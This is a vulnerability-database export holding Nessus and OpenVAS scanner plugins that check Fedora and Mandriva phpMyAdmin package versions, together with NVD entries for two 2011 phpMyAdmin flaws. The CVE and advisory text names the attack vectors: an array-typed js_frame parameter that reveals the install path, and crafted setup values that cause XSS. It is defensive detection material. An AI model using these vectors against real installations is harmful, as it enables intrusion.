(2011-10-16) :\n\n - [patch] InnoDB comment display with tooltips/aliases\n\n - [navi] Edit SQL statement after error\n\n - [interface] Collation not displayed for long enum\n fields\n\n - [export] Config for export compression not used\n\n - [privileges] DB-specific privileges won't submit\n\n - [config] Configuration storage incorrect suggested\n table name\n\n - [interface] Cannot execute saved query\n\n - [display] Full text button unchecks results display\n options\n\n - [display] Broken binary column when 'Show binary\n contents' is not set\n\n - [core] Call to undefined function PMA_isSuperuser()\n\n - [interface] Display options link missing after search\n\n - [core] CSP policy causing designer JS buttons to fail\n\n - [relation] Relations/constraints are dropped/created\n on every change\n\n - [display] Delete records from last page breaks search\n\n - [schema] PMA_User_Schema::processUserChoice() is\n broken\n\n - [core] External link fails in 3.4.5\n\n - [display] CharTextareaRows is not respected\n\n - [synchronize] Extraneous db choices\n\n - [security] Fixed local path disclosure vulnerability,\n see PMASA-2011-15=\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-15.php)\n\n - [security] Fixed XSS in setup (host/verbose parameter),\n see PMASA-2011-= 16\n (http://www.phpmyadmin.net/home_page/security/PMASA-2011\n -16.php)\n --------------------------------------------------------\n -------------------=\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=746880\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069237.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1e5fda7b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpMyAdmin-3.4.7-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "56798", "cpe": ["cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:phpMyAdmin"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:11:24", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in the setup interface in phpMyAdmin 3.4.x before 3.4.6 allows remote attackers to inject arbitrary web script or HTML via a crafted value.", "modified": "2011-12-15T03:57:00", "id": "CVE-2011-4064", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4064", "published": "2011-11-01T19:55:00", "title": "CVE-2011-4064", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:11:21", "bulletinFamily": "NVD", "description": "phpmyadmin.css.php in phpMyAdmin 3.4.x before 3.4.6 allows remote attackers to obtain sensitive information via an array-typed js_frame parameter to phpmyadmin.css.php, which reveals the installation path in an error message.", "modified": "2011-11-21T05:00:00", "id": "CVE-2011-3646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3646", "published": "2011-11-17T19:55:00", "title": "CVE-2011-3646", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2018-01-08T12:56:37", "bulletinFamily": "scanner", "description": "Check for the Version of phpMyAdmin", "modified": "2018-01-08T00:00:00", "published": "2012-04-02T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=864063", "id": "OPENVAS:864063", "title": "Fedora Update for phpMyAdmin FEDORA-2011-15460", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-15460\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the World Wide Web. Most frequently used operations are supported\n by the user interface (managing databases, tables, fields, relations, index=\n es,\n users, permissions), while you still have the ability to directly execute a=\n ny\n SQL statement.\n\n Features include an intuitive web interface, support for most MySQL features\n (browse and drop databases, tables, views, fields and indexes, create, copy,\n drop, rename and alter databases, tables, fields and indexes, maintenance\n server, databases and tables, with proposals on server configuration, execu=\n te,\n edit and bookmark any SQL-statement, even batch-queries, manage MySQL users\n and privileges, manage stored procedures and triggers), import data from CSV\n and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument T=\n ext\n and Spreadsheet, Word, Excel, LATEX and others, administering multiple serv=\n ers,\n creating PDF graphics of your database layout, creating complex queries usi=\n ng\n Query-by-example (QBE), searching globally in a database or a subset of it,\n transforming stored data into any format using a set of predefined function=\n s,\n like displaying BLOB-data as image or download-link and much more...\";\n\ntag_affected = \"phpMyAdmin on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069235.html\");\n script_id(864063);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 13:06:21 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-15460\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-15460\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.7~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:55:38", "bulletinFamily": "scanner", "description": "Check for the Version of phpMyAdmin", "modified": "2017-07-10T00:00:00", "published": "2011-11-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863617", "id": "OPENVAS:863617", "title": "Fedora Update for phpMyAdmin FEDORA-2011-15469", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-15469\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the World Wide Web. Most frequently used operations are supported\n by the user interface (managing databases, tables, fields, relations, indexes,\n users, permissions), while you still have the ability to directly execute any\n SQL statement.\n\n Features include an intuitive web interface, support for most MySQL features\n (browse and drop databases, tables, views, fields and indexes, create, copy,\n drop, rename and alter databases, tables, fields and indexes, maintenance\n server, databases and tables, with proposals on server configuration, execute,\n edit and bookmark any SQL-statement, even batch-queries, manage MySQL users\n and privileges, manage stored procedures and triggers), import data from CSV\n and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text\n and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers,\n creating PDF graphics of your database layout, creating complex queries using\n Query-by-example (QBE), searching globally in a database or a subset of it,\n transforming stored data into any format using a set of predefined functions,\n like displaying BLOB-data as image or download-link and much more...\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpMyAdmin on Fedora 15\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069237.html\");\n script_id(863617);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-14 10:48:00 +0530 (Mon, 14 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-15469\");\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-15469\");\n\n script_summary(\"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.7~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-11-14T00:00:00", "id": "OPENVAS:1361412562310863619", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863619", "title": "Fedora Update for phpMyAdmin FEDORA-2011-15472", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-15472\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069234.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863619\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-14 10:48:03 +0530 (Mon, 14 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-15472\");\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-15472\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.7~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-25T10:55:42", "bulletinFamily": "scanner", "description": "Check for the Version of phpMyAdmin", "modified": "2017-07-10T00:00:00", "published": "2011-11-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=863619", "id": "OPENVAS:863619", "title": "Fedora Update for phpMyAdmin FEDORA-2011-15472", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-15472\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the World Wide Web. Most frequently used operations are supported\n by the user interface (managing databases, tables, fields, relations, indexes,\n users, permissions), while you still have the ability to directly execute any\n SQL statement.\n\n Features include an intuitive web interface, support for most MySQL features\n (browse and drop databases, tables, views, fields and indexes, create, copy,\n drop, rename and alter databases, tables, fields and indexes, maintenance\n server, databases and tables, with proposals on server configuration, execute,\n edit and bookmark any SQL-statement, even batch-queries, manage MySQL users\n and privileges, manage stored procedures and triggers), import data from CSV\n and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text\n and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers,\n creating PDF graphics of your database layout, creating complex queries usi=\n ng Query-by-example (QBE), searching globally in a database or a subset of it,\n transforming stored data into any format using a set of predefined functions,\n like displaying BLOB-data as image or download-link and much more...\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpMyAdmin on Fedora 14\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069234.html\");\n script_id(863619);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-14 10:48:03 +0530 (Mon, 14 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-15472\");\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-15472\");\n\n script_summary(\"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.7~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-11-14T00:00:00", "id": "OPENVAS:1361412562310863617", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863617", "title": "Fedora Update for phpMyAdmin FEDORA-2011-15469", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-15469\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069237.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863617\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-14 10:48:00 +0530 (Mon, 14 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-15469\");\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-15469\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.7~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:42", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-04-02T00:00:00", "id": "OPENVAS:1361412562310864063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864063", "title": "Fedora Update for phpMyAdmin FEDORA-2011-15460", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-15460\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-November/069235.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864063\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 13:06:21 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3646\", \"CVE-2011-4064\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-15460\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-15460\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.7~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:55:23", "bulletinFamily": "scanner", "description": "Check for the Version of phpmyadmin", "modified": "2017-07-06T00:00:00", "published": "2011-10-31T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=831480", "id": "OPENVAS:831480", "title": "Mandriva Update for phpmyadmin MDVSA-2011:158 (phpmyadmin)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2011:158 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in phpmyadmin:\n\n Missing sanitization on the table, column and index names leads to\n XSS vulnerabilities (CVE-2011-3181).\n \n Firstly, if a row contains javascript code, after inline editing this\n row and saving, the code is executed. Secondly, missing sanitization\n on the db, table and column names leads to XSS vulnerabilities.\n \n When the js_frame parameter of phpmyadmin.css.php is defined as an\n array, an error message shows the full path of this file, leading to\n possible further attacks (CVE-2011-3646).\n \n Crafted values entered in the setup interface can produce XSS; also,\n if the config directory exists and is writeable, the XSS payload can\n be saved to this directory 